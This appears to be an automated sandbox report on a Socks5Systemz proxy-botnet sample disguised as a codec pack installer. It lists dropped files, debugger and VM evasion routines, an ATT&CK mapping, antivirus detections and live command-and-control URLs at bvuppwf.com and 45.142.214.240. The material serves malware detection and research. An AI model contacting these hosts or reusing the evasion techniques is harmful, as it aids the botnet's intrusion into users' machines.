        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0044AEEC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044AEEC
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,2_2_00401B4B
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_00401B4B
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_009FF8DA
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeWindow / User API: threadDelayed 9701Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\libbz2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\is-IQC7T.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\libvorbis-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\is-K7UM1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\is-K5GCJ.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\libogg-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\is-MD4P1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_RegDLL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\libwinpthread-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\is-MU2B9.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\is-7NJT9.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Codec Pack Update\is-06H7C.tmpJump to dropped file
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-6445
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-2438
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe TID: 7148Thread sleep count: 120 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe TID: 7148Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe TID: 2044Thread sleep count: 89 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe TID: 2044Thread sleep time: -5340000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe TID: 7148Thread sleep count: 9701 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe TID: 7148Thread sleep time: -19402000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0047A44C FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_0047A44C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0047077C FindFirstFileA,FindNextFileA,FindClose,1_2_0047077C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004513E4 FindFirstFileA,GetLastError,1_2_004513E4
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004601DC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_004601DC
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00478334 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_00478334
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00460658 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00460658
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0045EC50 FindFirstFileA,FindNextFileA,FindClose,1_2_0045EC50
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00491EBC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00491EBC
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_00409A14 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409A14
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeThread delayed: delay time: 60000Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: 0RWRPBSuDx.tmp, 00000001.00000002.2867870941.0000000000689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: codecpackupdate.exe, 00000003.00000002.2868115063.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, codecpackupdate.exe, 00000003.00000002.2868115063.00000000009E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeAPI call chain: ExitProcess graph end nodegraph_0-6303
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeAPI call chain: ExitProcess graph end nodegraph_3-19020

        Anti Debugging

        barindex
        Found API chain indicative of debugger detection
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_3-17661
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A100FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_00A100FE
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A100FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_00A100FE
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00447DC0 LoadLibraryExA,LoadLibraryA,GetProcAddress,1_2_00447DC0
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_009F6487 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,3_2_009F6487
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A09468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00A09468
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004734AC ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_004734AC
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0045AEE4 GetVersion,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,AllocateAndInitializeSid,GetLastError,LocalFree,1_2_0045AEE4
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeCode function: 3_2_00A07FAD cpuid 3_2_00A07FAD
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: GetLocaleInfoA,0_2_0040515C
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: GetLocaleInfoA,0_2_004051A8
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: GetLocaleInfoA,1_2_004084D0
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: GetLocaleInfoA,1_2_0040851C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004569D4 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004569D4
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00453D04 GetUserNameA,1_2_00453D04
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeCode function: 0_2_00405C44 GetVersionExA,0_2_00405C44

        Stealing of Sensitive Information

        barindex
        Yara detected Socks5Systemz
        Source: Yara matchFile source: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2867940792.0000000000731000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: codecpackupdate.exe PID: 7084, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Socks5Systemz
        Source: Yara matchFile source: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2867940792.0000000000731000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: codecpackupdate.exe PID: 7084, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
        Native API        		1
        DLL Side-Loading        		1
        Exploitation for Privilege Escalation        		1
        Deobfuscate/Decode Files or Information        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		2
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts2
        Service Execution        		4
        Windows Service        		1
        DLL Side-Loading        		3
        Obfuscated Files or Information        		LSASS Memory1
        Account Discovery        		Remote Desktop ProtocolData from Removable Media2
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        Bootkit        		1
        Access Token Manipulation        		22
        Software Packing        		Security Account Manager3
        File and Directory Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook4
        Windows Service        		1
        DLL Side-Loading        		NTDS35
        System Information Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
        Process Injection        		1
        Masquerading        		LSA Secrets241
        Security Software Discovery        		SSHKeylogging112
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
        Virtualization/Sandbox Evasion        		Cached Domain Credentials121
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Access Token Manipulation        		DCSync11
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
        Process Injection        		Proc Filesystem3
        System Owner/User Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Bootkit        		/etc/passwd and /etc/shadow1
        Remote System Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
        System Network Configuration Discovery        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        0RWRPBSuDx.exe8%ReversingLabs
        0RWRPBSuDx.exe10%VirustotalBrowse
        0RWRPBSuDx.exe100%AviraHEUR/AGEN.1332570

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exe100%AviraHEUR/AGEN.1324697
        C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe100%AviraHEUR/AGEN.1324697
        C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe100%Joe Sandbox ML
        C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exe38%VirustotalBrowse
        C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe38%VirustotalBrowse
        C:\Users\user\AppData\Local\Codec Pack Update\is-06H7C.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Codec Pack Update\is-06H7C.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Codec Pack Update\is-7NJT9.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Codec Pack Update\is-7NJT9.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Codec Pack Update\is-IQC7T.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Codec Pack Update\is-IQC7T.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Codec Pack Update\is-K5GCJ.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Codec Pack Update\is-K5GCJ.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Codec Pack Update\is-K7UM1.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Codec Pack Update\is-K7UM1.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Codec Pack Update\is-MD4P1.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Codec Pack Update\is-MU2B9.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Codec Pack Update\is-MU2B9.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Codec Pack Update\libbz2-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Codec Pack Update\libbz2-1.dll (copy)0%VirustotalBrowse
        C:\Users\user\AppData\Local\Codec Pack Update\libgcc_s_dw2-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Codec Pack Update\libgcc_s_dw2-1.dll (copy)0%VirustotalBrowse
        C:\Users\user\AppData\Local\Codec Pack Update\libogg-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Codec Pack Update\libogg-0.dll (copy)0%VirustotalBrowse
        C:\Users\user\AppData\Local\Codec Pack Update\libvorbis-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Codec Pack Update\libvorbis-0.dll (copy)0%VirustotalBrowse
        C:\Users\user\AppData\Local\Codec Pack Update\libwinpthread-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Codec Pack Update\libwinpthread-1.dll (copy)0%VirustotalBrowse
        C:\Users\user\AppData\Local\Codec Pack Update\unins000.exe (copy)0%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_RegDLL.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_RegDLL.tmp3%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_iscrypt.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_iscrypt.dll1%VirustotalBrowse

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.remobjects.com/psU0%URL Reputationsafe
        http://www.remobjects.com/ps0%URL Reputationsafe
        http://www.innosetup.com/0%Avira URL Cloudsafe
        http://45.142.214.240/search/?q=67e28dd80%Avira URL Cloudsafe
        http://45.142.214.240/0%Avira URL Cloudsafe
        http://45.142.214.240/search/?q=0%Avira URL Cloudsafe
        http://45.142.214.240/search/?q=67e28dd86d55f1280%Avira URL Cloudsafe
        http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e90%Avira URL Cloudsafe
        http://vovsoft.com0%Avira URL Cloudsafe
        https://vovsoft.com/newsletter/0%Avira URL Cloudsafe
        http://45.142.214.240/8%VirustotalBrowse
        http://www.innosetup.com/1%VirustotalBrowse
        http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df0%Avira URL Cloudsafe
        http://www.openssl.org).0%Avira URL Cloudsafe
        http://vovsoft.com0%VirustotalBrowse
        bvuppwf.com0%Avira URL Cloudsafe
        http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d7840%Avira URL Cloudsafe
        https://vovsoft.com/contact/.0%Avira URL Cloudsafe
        http://bvuppwf.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ec909e3b0%Avira URL Cloudsafe
        http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992820%Avira URL Cloudsafe
        http://45.142.214.240/search/?q=67e28dd86d55f128U-~0%Avira URL Cloudsafe
        http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c(0%Avira URL Cloudsafe
        https://vovsoft.com/contact/.0%VirustotalBrowse
        https://vovsoft.com/contact/0%Avira URL Cloudsafe
        http://45.142.214.240/se0-0%Avira URL Cloudsafe
        http://bvuppwf.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a92160%Avira URL Cloudsafe
        https://vovsoft.com/newsletter/0%VirustotalBrowse
        https://vovsoft.com/contact/0%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        bvuppwf.com
        		45.142.214.240
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          bvuppwf.comtrue
          • Avira URL Cloud: safe
          		unknown
          http://bvuppwf.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ec909e3btrue
          • Avira URL Cloud: safe
          		unknown
          http://bvuppwf.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216true
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.innosetup.com/0RWRPBSuDx.tmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-MD4P1.tmp.1.dr, 0RWRPBSuDx.tmp.0.drfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://45.142.214.240/search/?q=67e28dd86d55f128codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://45.142.214.240/search/?q=codecpackupdate.exe, 00000003.00000002.2869004771.0000000003682000.00000004.00000020.00020000.00000000.sdmp, codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://45.142.214.240/search/?q=67e28dd8codecpackupdate.exe, 00000003.00000002.2869004771.0000000003682000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://45.142.214.240/codecpackupdate.exe, 00000003.00000002.2868115063.00000000009C9000.00000004.00000020.00020000.00000000.sdmpfalse
          • 8%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.remobjects.com/psU0RWRPBSuDx.exe, 00000000.00000003.1608850294.0000000002088000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000003.1608714441.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-MD4P1.tmp.1.dr, 0RWRPBSuDx.tmp.0.drfalse
          • URL Reputation: safe
          		unknown
          http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e9codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
